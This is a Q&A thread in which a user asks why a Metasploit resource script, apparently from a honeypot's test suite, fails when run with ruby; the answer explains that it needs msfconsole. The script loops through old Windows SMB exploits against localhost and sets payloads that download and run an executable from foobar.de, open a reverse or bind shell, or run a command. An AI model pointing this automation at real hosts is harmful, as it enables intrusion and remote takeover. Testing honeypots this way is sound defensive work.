# Error resource rc:3: syntax error, unexpected '<', expecting end-of-input <ruby>

Tags: ruby, metasploit

I am trying to execute a ruby script which should test some functionality of a honeypot:
This is the script:

```
version

<ruby>
    sleep(1)

    shellcodes = { 
        'download:exec' => {
            'payload' => 'windows/download_exec',
            'options' => {
                    'URL' => 'http://foobar.de/test.exe'
            }
        },
        'shell:reverse' => {
            'payload' => 'windows/shell/reverse_tcp',
            'options' => {
                    'LHOST' => '127.0.0.1',
                    'LPORT' => 4445
            }
        },

        'shell:bind' => {
            'payload' => 'windows/shell/bind_tcp',
            'options' => {
                    'LPORT' => 4444
            }
        },

        'exec' => {
            'payload' => 'windows/exec',
            'options' => {
                    'CMD' => 'echo foo'
            }
        }

    }

    exploits = {
        'ms03-049' => {
            'exploit' => 'exploit/windows/smb/ms03_049_netapi',
            'shellcode' => {
                'allow' => ['download:exec']
            }
        },

        'ms04-007' => {
            'exploit' => 'exploit/windows/smb/ms04_007_killbill',
            'shellcode' => {
                'allow' => ['download:exec']
            }
        },

        'ms04-011' => {
            'exploit' => 'exploit/windows/smb/ms04_011_lsass',
            'shellcode' => {
                'allow' => ['download:exec']
            }
        },

        'ms04-031' => {
            'exploit' => 'exploit/windows/smb/ms04_031_netdde',
            'shellcode' => {
                'allow' => ['download:exec']
            }
        },

        'ms05-039' => {
            'exploit' => 'exploit/windows/smb/ms05_039_pnp',
            'shellcode' => {
                'allow' => ['download:exec']
            }
        },

#       'ms06-025' => {
#           'exploit' => ['exploit/windows/smb/ms06_025_rasmans_reg','exploit/windows/smb/ms06_025_rasmans_rras']
#       },

        'ms06-040' => {
            'exploit' => 'exploit/windows/smb/ms06_040_netapi',
            'shellcode' => {
                'allow' => ['download:exec']
            }
        },

#       'ms06-066' => {
#           'exploit' => ['exploit/windows/smb/ms06_066_nwapi','exploit/windows/smb/ms06_066_nwwks'],
#       },

        'ms06-070' => {
            'exploit' => 'exploit/windows/smb/ms06_070_wkssvc',
            'shellcode' => {
                'allow' => ['download:exec']
            }
        },

        'ms07-029' => {
            'exploit' => 'exploit/windows/smb/ms07_029_msdns_zonename',
            'shellcode' => {
                'allow' => ['download:exec']
            }
        },

        'ms08-067' => {
            'exploit' => 'exploit/windows/smb/ms08_067_netapi',
            'shellcode' => {
                'allow' => ['download:exec']
            }
        },

        'ms09-050' => {
            'exploit' => 'exploit/windows/smb/ms09_050_smb2_negotiate_func_index',
            'options' => {
                'WAIT' => 2
            },
            'shellcode' => {
                'allow' => ['download:exec']
            }
        },

        'ms10-061' => {
            'exploit' => 'exploit/windows/smb/ms10_061_spoolss',
            'options' => {
                'PNAME' => 'XPSPrinter'
            }
        }
    }

    while (true)
        exploits.each { |xpk, xpv|

            print_status("Running #{xpk}")
            run_single("use #{xpv['exploit']}")
            run_single("set RHOST 127.0.0.1")

            if xpv.has_key?('options') then
                options = xpv['options']
                options.each { |key,value|
                    run_single("set #{key} #{value}")
                }
            end

            isallowed = true
            if xpv.has_key?('shellcode') then
                isallowed = false       
                allow = xpv['shellcode']['allow']
            else
                allow = []
            end

            shellcodes.each { |sck, scv| 
                allowed = isallowed
                allow.each { |a| 
                    if sck.match(/#{a}/) then
                        allowed = true
                        if xpv['shellcode'].has_key?('deny') then
                            deny = xpv['shellcode']['deny']
                            deny.each { |d|
#                               print_status("deny #{sck} #{d}")
                                if sck.match(/#{d}/) then
                                    allowed = false
                                    break
                                end
                            }
                        end
                        break
                    end
                }
                if not allowed then
                    next
                end

                run_single("set PAYLOAD #{scv['payload']}")
                options = scv['options']
                options.each { |key,value|
                    run_single("set #{key} #{value}")
                }
                sleep(1)
                print_status("Exploit #{xpk} Payload #{scv['payload']}")
                run_single("exploit")
            }
        }

    end
</ruby>
```

When i try to execute ($ruby script.rb) it gives me the following error:

```
resource rc:3: syntax error, unexpected '<', expecting end-of-input
<ruby>
```

I must tell you that i have no idea about programming in ruby. I only want to execute that script. I tried to find something on the internet about structure of ruby script but nothing so i ask help from you.

Comment: why you use `<ruby></ruby>` tags?

Comment: I try already the script without that tags but it doesn't work. This script is from test suite of a repository. Is not written by me

Answer (score 2):

This is not a **Ruby** script, but a **Metasploit** script.

Assuming its name is `script.rc`, you should run it like so: `msfconsole -r script.rc`, and not `ruby script.rc`.

Or, if you already are in `msfconsole`, run it like this: `resource script.rc`